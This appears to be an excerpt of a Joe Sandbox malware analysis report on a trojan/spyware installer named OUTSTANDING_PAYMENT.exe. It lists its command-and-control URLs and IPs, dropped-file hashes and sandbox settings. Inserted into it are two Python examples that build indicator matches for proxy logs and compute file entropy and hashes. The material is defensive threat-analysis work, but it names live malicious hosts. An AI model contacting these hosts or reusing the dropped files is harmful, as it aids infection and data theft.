                                                                                              http://www.karlscurry.co.uk/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.leewanyam.com/0oqq/poIb=tYchV8explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.allison2patrick.onlineexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.brennmansoluciones.com/0oqq/poIb=tYchV8explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.glb-mobility.com/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.brennmansoluciones.com/0oqq/explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://search.yahoo.com?fr=crmas_sfpfrundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                                                                                high
                                                                                                https://www.fasthosts.co.uk/domain-names/search/?domain=$rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.themssterofssuepnse.rest/0oqq/explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                http://www.leewanyam.com/0oqq/explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.landlotto.ru/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                https://fasthosts.co.uk/rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.ketoibabal.cyouexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.nic.ru/catalog/hosting/shared/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.mynichemarket.co.uk/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://www.themssterofssuepnse.rest/0oqq/poIb=tYchV8explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  unknown
                                                                                                  https://www.nic.ru/catarundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.ketoibabal.cyou/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.nic.ru/catalog/hosting/shared/?ipartner=6666&adv_id=click_vh&utm_source=stpg_all&utm_medrundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.landlotto.ruexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icorundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                                                                                        high
                                                                                                        https://www.nic.ru?ipartner=6666&adv_id=logo&utm_source=stpg_all&utm_medium=link&utm_campaign=logorundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.virginhairweave.co.ukexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://www.litespeedtech.com/error-pagerundll32.exe, 0000000D.00000002.781120791.000000000595E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchrundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                                                                                              high
                                                                                                              https://www.nic.ru/catalog/hosting/cms/?ipartner=6666&adv_id=click_cmsh&utm_source=stpg_all&utm_medirundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.themssterofssuepnse.rest/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                https://ac.ecosia.org/autocomplete?q=81EFaKSJ3.13.drfalse
                                                                                                                  high
                                                                                                                  https://search.yahoo.com?fr=crmas_sfprundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                                                                                                    high
                                                                                                                    https://www.nic.ru/catalog/hosting/vds-vps/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.g2fm.co.ukexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
IP | Domain | Country | ASN | ASN name | Malicious
109.70.26.37 | www.landlotto.ru | Russian Federation | 48287 | RU-CENTERRU | true
88.99.217.197 | glb-mobility.com | Germany | 24940 | HETZNER-ASDE | true
217.160.0.249 | www.karlscurry.co.uk | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
162.209.159.142 | www.ty23vip.com | United States | 40065 | CNSERVERSUS | true
192.64.116.162 | www.gorwly.top | United States | 22612 | NAMECHEAP-NETUS | true
199.59.243.223 | www.hudsonandbailey.uk | United States | 395082 | BODIS-NJUS | true
5.181.216.141 | dirdikyepedia.com | Germany | 59637 | ASRSINETRU | true
62.4.21.190 | allison2patrick.online | France | 12876 | OnlineSASFR | true
185.151.30.181 | www.mynichemarket.co.uk | United Kingdom | 48254 | TWENTYIGB | true
203.245.24.47 | fanversewallet.com | Korea, Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | true
198.58.118.167 | www.virginhairweave.co.uk | United States | 63949 | LINODE-APLinodeLLCUS | true
213.171.195.105 | www.g2fm.co.uk | United Kingdom | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
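Added example, not part of the Joe Sandbox report: the URL rows above that the injected explorer.exe contacted all share the path directory "/0oqq/", yet Avira URL Cloud rates most of those hosts "safe", so a reputation lookup alone would miss them. The script copies the relevant URL rows and IP/domain rows from the two tables, derives host, IP and C2-path indicators from them (learning the shared directory rather than hard-coding it), and runs those indicators over proxy log lines. The log format and the log lines are constructed for the example; the strings from rundll32.exe and the dropped file 81EFaKSJ3.13.dr (search-engine and parking-page URLs rated "high") are deliberately left out of the indicator set.

```python
"""Build an indicator set from this report's URL and IP/domain rows and run
it over proxy log lines. Added example; not part of the Joe Sandbox report.
The log format and SAMPLE_LOG lines are constructed."""
from collections import Counter
from urllib.parse import urlsplit

# (URL, source process, Avira URL Cloud verdict) copied from the URL table above.
REPORT_URLS = [
    ("http://www.brennmansoluciones.com/0oqq/qt9TW=60_ljPJoqo6d2", "explorer.exe", "safe"),
    ("http://www.karlscurry.co.uk/0oqq/qt9TW=60_ljPJoqo6d2", "explorer.exe", "safe"),
    ("http://www.leewanyam.com/0oqq/poIb=tYchV8", "explorer.exe", "safe"),
    ("http://www.themssterofssuepnse.rest/0oqq/", "explorer.exe", "malware"),
    ("http://www.landlotto.ru/0oqq/qt9TW=60_ljPJoqo6d2", "explorer.exe", "malware"),
    ("http://www.ketoibabal.cyou/0oqq/qt9TW=60_ljPJoqo6d2", "explorer.exe", "safe"),
    ("http://www.glb-mobility.com/0oqq/qt9TW=60_ljPJoqo6d2", "explorer.exe", "safe"),
    ("http://www.gorwly.top", "explorer.exe", "malware"),
    ("https://www.nic.ru/catalog/hosting/shared/", "rundll32.exe", None),
    ("https://search.yahoo.com?fr=crmas_sfp", "rundll32.exe", None),
]

# (IP, domain) copied from the IP/domain table above.
REPORT_IPS = [
    ("109.70.26.37", "www.landlotto.ru"),
    ("88.99.217.197", "glb-mobility.com"),
    ("217.160.0.249", "www.karlscurry.co.uk"),
    ("192.64.116.162", "www.gorwly.top"),
    ("5.181.216.141", "dirdikyepedia.com"),
]


def _bare(host):
    """Normalise 'www.example.com' and 'example.com' to one form."""
    return host[4:] if host.startswith("www.") else host


def build_indicators(urls, ips):
    """Derive host, IP and C2-path indicators.

    Only URLs contacted by the injected explorer.exe count as C2 candidates;
    the rundll32.exe/dropped-file strings are search-engine and parking-page
    URLs the report rates 'high'. The C2 directory ('/0oqq/' in this report)
    is taken by majority vote over the first path segment of those URLs.
    """
    injected = [urlsplit(u) for u, src, _ in urls if src == "explorer.exe"]
    dirs = Counter(p.path.split("/")[1] for p in injected if p.path.count("/") >= 2)
    c2_dir = "/%s/" % dirs.most_common(1)[0][0]
    hosts = {_bare(p.hostname) for p in injected} | {_bare(d) for _, d in ips}
    return {"hosts": hosts, "ips": {ip for ip, _ in ips}, "c2_dir": c2_dir}


def classify(line, ind):
    """Return the reasons a proxy log line matches, or [] if it does not.

    Constructed log format: '<epoch> <client> <method> <url> <server_ip>'.
    """
    _ts, _client, _method, url, server_ip = line.split()
    p = urlsplit(url)
    reasons = []
    if _bare(p.hostname or "") in ind["hosts"]:
        reasons.append("host listed in report")
    if server_ip in ind["ips"]:
        reasons.append("server IP listed in report")
    if p.path.startswith(ind["c2_dir"]):
        reasons.append("path under C2 directory " + ind["c2_dir"])
    return reasons


# Constructed proxy log lines; server IPs other than the report's are from
# documentation ranges.
SAMPLE_LOG = [
    "1679299680 10.0.0.21 GET http://www.brennmansoluciones.com/0oqq/poIb=tYchV8 198.51.100.17",
    "1679299702 10.0.0.21 POST http://www.landlotto.ru/0oqq/ 109.70.26.37",
    "1679299730 10.0.0.21 GET http://www.unlisted.example/0oqq/qt9TW=60_ljPJoqo6d2 203.0.113.7",
    "1679299745 10.0.0.21 GET https://www.nic.ru/catalog/hosting/shared/ 192.0.2.10",
]


def scan(lines, ind):
    """Map each matching line to its reasons; clean lines are omitted."""
    hits = {}
    for ln in lines:
        reasons = classify(ln, ind)
        if reasons:
            hits[ln] = reasons
    return hits


if __name__ == "__main__":
    indicators = build_indicators(REPORT_URLS, REPORT_IPS)
    for ln, reasons in scan(SAMPLE_LOG, indicators).items():
        print(ln.split()[3], "->", "; ".join(reasons))
```

The first sample line is flagged on host and path even though Avira rates brennmansoluciones.com "safe"; the second is flagged on host, server IP and path; the third, an unlisted host with the same "/0oqq/" directory, is flagged on path alone, which is a lead to confirm against the sample's other indicators rather than a verdict, since a four-character directory name can collide with legitimate traffic; the nic.ru line is not flagged.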
                                                                                                                      Joe Sandbox Version:37.0.0 Beryl
                                                                                                                      Analysis ID:830322
                                                                                                                      Start date and time:2023-03-20 09:06:45 +01:00
                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                      Overall analysis duration:0h 13m 10s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:light
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                      Number of analysed new started processes analysed:18
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:1
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • HDC enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample file name:OUTSTANDING_PAYMENT.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/5@26/12
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      HDC Information:
                                                                                                                      • Successful, ratio: 33.6% (good quality ratio 32.5%)
                                                                                                                      • Quality average: 81%
                                                                                                                      • Quality standard deviation: 24.3%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      • Number of executed functions: 0
                                                                                                                      • Number of non-executed functions: 0
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Override analysis time to 240s for rundll32
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                      • HTTP Packets have been reduced
                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
09:07:58 | API Interceptor | 1873x Sleep call for process: explorer.exe modified
                                                                                                                      No context
                                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):94208
                                                                                                                      Entropy (8bit):1.2882898331044472
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                                                      MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                                                      SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                                                      SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                                                      SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                                                      Malicious:false
                                                                                                                      Reputation:high, very likely benign file
                                                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6222
                                                                                                                      Entropy (8bit):7.133693106224874
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:Farc6oYwg/DrYu8k2XO5oSwQCahg5GwYTfOdaFxrsyGIi1GReZw7zmzuZP0ed:FarcRYkhX1S1CapwYmaFmyGIDCzzSL
                                                                                                                      MD5:933BE16F654BB3BC251347110454FB49
                                                                                                                      SHA1:A4580CC4A1D3AC955D648A9C34BBD27B5C48F9AE
                                                                                                                      SHA-256:5252B99D4CEB221CF6F0440F0F2430F7A76D1B6EAC6AB2997FB21828400B502E
                                                                                                                      SHA-512:845B3DA4F3AA844508AC7B0CE86253A2E588C994308D29EFB5385034CF38C413258820CB0C7C938F04E7B447549FE24076CD1EA327957AD70D200748BAAC942B
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..
                                                                                                                      Process:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):288752
                                                                                                                      Entropy (8bit):7.703024922742189
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:7iDso57TQE/u3+8fgnGdzNrja8LI57EUHyTZ5CslO2br0xp1I:7iDsO7Myi+3nGdRa8Lyw57lO2brm
                                                                                                                      MD5:B770DC09825AC013742565DF7C5B0DF5
                                                                                                                      SHA1:8B0F5C52ABE0EB2310371254F051F63DD2841AF6
                                                                                                                      SHA-256:4A205CB23069324967DFE9615F25B7D8118D779979BFE22A8E366B02180AB140
                                                                                                                      SHA-512:87B160CBAFC2D042000A201802FAF88F5674C498624A9802D98BC0AF6B4386E8A54110ABB1CA769654259091C35511898A50CC82E759B02EEF32CB4D20BDA22A
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:.-......,...................s...p........,.......-..............................................................................*...........................................................................................................................................................G...............%...j...........................................................................................................................................C...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):59904
                                                                                                                      Entropy (8bit):6.225922782264242
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:Rpbnyq696YM4+FJV/dRuDh96ir6VhAkAXuabEoK3r412IGXM5x8dsr:RpbRrYSJV/ToZr6VhhAXj7GnI15is
                                                                                                                      MD5:41C9E29A7ED3640682A0003BE2DF4D93
                                                                                                                      SHA1:E22976256F765E9B526728A2890D2A59FD535636
                                                                                                                      SHA-256:FE949C62767413F53307655AE55EFAD92454EAF28DC874F4650DDD74C79A7050
                                                                                                                      SHA-512:FC22103EB32998D76A3207EA789011E7633E3B7838DAD274C41930908E19F74905C101D9FABA58A3B8295248A94F38EF4932248DFCFD84D2A24D160335E8C48A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                      Reputation:low
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................1... ...6..............<...$...Rich...................PE..L...?..d.....................`....................@..........................0............@.................................d................................ .......................................................................................text............................... ..`.rdata...!......."..................@..@.data....,..........................@....reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):210904
                                                                                                                      Entropy (8bit):7.998936663875696
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:6144:OiDso57TQE/u3+8fgnGdzNrja8LI57EUHyTZ5CslO2l:OiDsO7Myi+3nGdRa8Lyw57lO2l
                                                                                                                      MD5:9E7E609FCC35E2BF40522D621CB62D4F
                                                                                                                      SHA1:17E126ADA88229FE6C42E2DAFEE0080C6643F345
                                                                                                                      SHA-256:0DD2596D144CACBA46ECD058E5CE2F13D27414313D8D33DADBDC455F3358B09A
                                                                                                                      SHA-512:68BEB80FE38D860FAAB5F40398B0EFC91A60A33946AE5D9A259007B35FF0F87D7C6DBD7EED662F0B21954F7656F1860D0029EE828A2EC8D062DF5D896F84BB42
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:....._0.a.!..@...7.?\n...8I~JK.O.|...@.W.>..=..{..*X......J..AWE...N>..J..6.Z..l..]S=7....k!.n...K..Z...1'.z 4h.....Y.........>bt@iReh.u..c..k.QY...}...9....>..62I.K.../b.....M..s.K9.......Il5k.g..J_......Y..o._\......[.....l.+.8....{..g..V..J...._0....t.k.4.~......$>=<.r.O..=.@..>E.=..{./*X......J...(.....h.....`B\.e....1.zN..J....mrX......G....&x..v.FC.............o...?/.#..x..{.3h.-.!.....5...=t"....r...b.....M..+(t.K9..Z..O.ml/}r..J_......&:/.U..f......[.,.....+.......{.mg..Q......_0.a..t.k.4...)...$>=D.K.O.|...@.W.>..=..{..*X......J...(.....h.....`B\.e....1.zN..J....mrX......G....&x..v.FC.............o...?/.#..x..{.3h.-.!.....5...=t"....r...b.....M..s.K9.N...O+ml/.....J_......&:/.o..\......[.,.....+.......{.mg..Q......_0.a..t.k.4...)...$>=D.K.O.|...@.W.>..=..{..*X......J...(.....h.....`B\.e....1.zN..J....mrX......G....&x..v.FC.............o...?/.#..x..{.3h.-.!.....5...=t"....r...b.....M..s.K9.N...O+ml/.....J_......&:/.o..\......[
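The per-file fields the sandbox prints above (file type, size, 8-bit entropy, the "Encrypted" verdict and the four hashes) are cheap to reproduce in a triage script, which is useful when you want to re-check a drop folder from an incident against the report's values. The following is an added example and not Joe Sandbox's own code. It uses only the standard library; the sample inputs are constructed stand-ins for the three kinds of drop listed here (a near-empty SQLite database, a padded PE header, a uniform blob that behaves like an encrypted payload), not the real files, and the entropy cut-off used for the "encrypted" verdict is an assumption chosen to reproduce the report's decisions on this page (7.9989 flagged, 7.886 and 7.703 not). SSDEEP and TLSH are left out because they need third-party libraries.

```python
import hashlib
import math
from collections import Counter

# Magic-number prefixes for the file types that appear in this report's
# dropped-file list; anything else is reported as plain "data".
MAGICS = (
    (b"MZ", "PE32 executable (DOS/MZ header)"),
    (b"SQLite format 3\x00", "SQLite 3.x database"),
)

# Entropy above which a blob is treated as packed/encrypted. The sandbox's own
# cut-off is not published on the page; 7.95 is an assumption that reproduces
# its verdicts here (7.9989 -> true, 7.886 and 7.703 -> false).
ENCRYPTED_ENTROPY = 7.95


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant stream, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())


def identify(data: bytes) -> str:
    """Cheap libmagic substitute: match the known prefixes, else 'data'."""
    for magic, name in MAGICS:
        if data.startswith(magic):
            return name
    return "data"


def triage(data: bytes) -> dict:
    """Return the same fields the report prints per dropped file."""
    ent = shannon_entropy(data)
    return {
        "file_type": identify(data),
        "size": len(data),
        "entropy": round(ent, 6),
        "encrypted": ent >= ENCRYPTED_ENTROPY,
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


# Constructed stand-ins for the drops seen above (not the real files):
# a mostly-empty SQLite database, a PE header with padding, and a uniform
# blob that scores like an encrypted payload.
SAMPLE_SQLITE = b"SQLite format 3\x00" + bytes(2048 - 16)
SAMPLE_PE = b"MZ" + bytes(62) + b"PE\x00\x00" + bytes(512)
SAMPLE_ENCRYPTED = bytes(range(256)) * 8

if __name__ == "__main__":
    for label, blob in (("sqlite", SAMPLE_SQLITE), ("pe", SAMPLE_PE), ("blob", SAMPLE_ENCRYPTED)):
        info = triage(blob)
        print(f"{label}: {info['file_type']}, {info['size']} bytes, entropy {info['entropy']}, "
              f"encrypted={info['encrypted']}, sha256={info['sha256']}")
```

Entropy alone is a weak signal: a legitimately compressed resource scores as high as an encrypted payload, so the verdict is a prompt to look closer, not a classification. The hashes, by contrast, are what you pivot on when matching a file recovered from a host against this report.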
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                      Entropy (8bit):7.886295753349112
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:OUTSTANDING_PAYMENT.exe
                                                                                                                      File size:297210
                                                                                                                      MD5:4832e17c1f6841aee2e1984a429ed946
                                                                                                                      SHA1:d7ad36c7bee5cb39aa5b77944ced8a716a8af545
                                                                                                                      SHA256:d0ac15eeb53f64ad6f399ead8724f38344daf243332f03790598c6716a04f162
                                                                                                                      SHA512:f7dbb5749ad23b13d001c55be2ba6e4b8deab56d0687804c8a61bddb98b723bd1a244c32507bb16b9544e092d7bf5a37480d6ff34944752dfe464d30ada7244e
                                                                                                                      SSDEEP:6144:qYa6cFVIKVgBgM6rpFh/U8KAg9gxt03ZaHJ1XoF5KOJeeqN3rj:qYa3fWg3TK8KRg4pCUGj
                                                                                                                      TLSH:615402D19350D1E6E8A706F00C35EA2712BF7E3D54705E4A3B9E71A97E73192822EE03
